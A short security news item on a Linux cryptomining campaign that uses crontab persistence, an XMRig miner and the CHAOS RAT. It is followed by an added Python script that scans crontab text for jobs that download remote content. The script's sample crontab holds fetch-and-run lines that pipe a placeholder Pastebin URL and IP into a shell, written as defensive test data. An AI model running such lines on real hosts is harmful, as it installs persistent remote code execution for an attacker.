
A cryptocurrency mining attack targeting the Linux operating system also involved the use of an open source remote access trojan (RAT) dubbed CHAOS.

The threat, which was spotted by Trend Micro in November 2022, remains virtually unchanged in all other aspects, including terminating competing malware and security software and deploying the Monero (XMR) cryptocurrency miner.

“The malware achieves its persistence by altering /etc/crontab file, a UNIX task scheduler that, in this case, downloads itself every 10 minutes from Pastebin,” researchers David Fiser and Alfredo Oliveira said.

This step is followed by the download of next-stage payloads that consist of the XMRig miner and the Go-based CHAOS RAT.
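To check a host for the kind of crontab persistence described above, the following added example (not code from the article or from Trend Micro) parses text in `/etc/crontab` format and flags jobs that download from a URL, noting whether the result is piped into a shell and whether the job repeats on a short interval. The sample crontab, the `pastebin.example` URL, the IP address and the function names are constructed for illustration.

```python
import re

# Constructed /etc/crontab sample; the URL, IP and paths are placeholders.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/10 * * * * root curl -fsSL https://pastebin.example/raw/PLACEHOLDER | sh
0 3 * * * backup /usr/local/bin/backup.sh
@reboot root wget -q -O- http://198.51.100.7/x.sh | bash
"""

FETCH = re.compile(r"\b(?:curl|wget|fetch)\b")
URL = re.compile(r"\b(?:https?|ftp)://[^\s'\"|;)]+", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/\S*/)?(?:ba|da|z)?sh\b")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def parse_system_crontab(text):
    """Yield (lineno, schedule, user, command) for each job in /etc/crontab format."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        nsched = 1 if line.startswith("@") else 5  # @reboot etc. use one field
        parts = line.split(None, nsched + 1)
        if len(parts) < nsched + 2:
            continue  # malformed line: no user or command field
        yield lineno, " ".join(parts[:nsched]), parts[nsched], parts[nsched + 1]

def suspicious_jobs(text):
    """Return jobs whose command downloads from a URL, with supporting reasons."""
    findings = []
    for lineno, schedule, user, command in parse_system_crontab(text):
        urls = URL.findall(command)
        if not (FETCH.search(command) and urls):
            continue
        reasons = ["fetches remote content"]
        if PIPE_TO_SHELL.search(command):
            reasons.append("pipes into a shell")
        step = re.fullmatch(r"\*/(\d+)", schedule.split()[0])
        if step:
            reasons.append(f"re-runs every {step.group(1)} minutes")
        findings.append({"line": lineno, "user": user, "schedule": schedule,
                         "urls": urls, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in suspicious_jobs(SAMPLE_CRONTAB):
        print(f"crontab line {f['line']} ({f['user']}, {f['schedule']}): "
              f"{', '.join(f['reasons'])} -> {', '.join(f['urls'])}")
```

On a real host, pass the contents of `/etc/crontab` and the files under `/etc/cron.d/` to `suspicious_jobs`; per-user crontabs omit the user field and need a separate parser.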
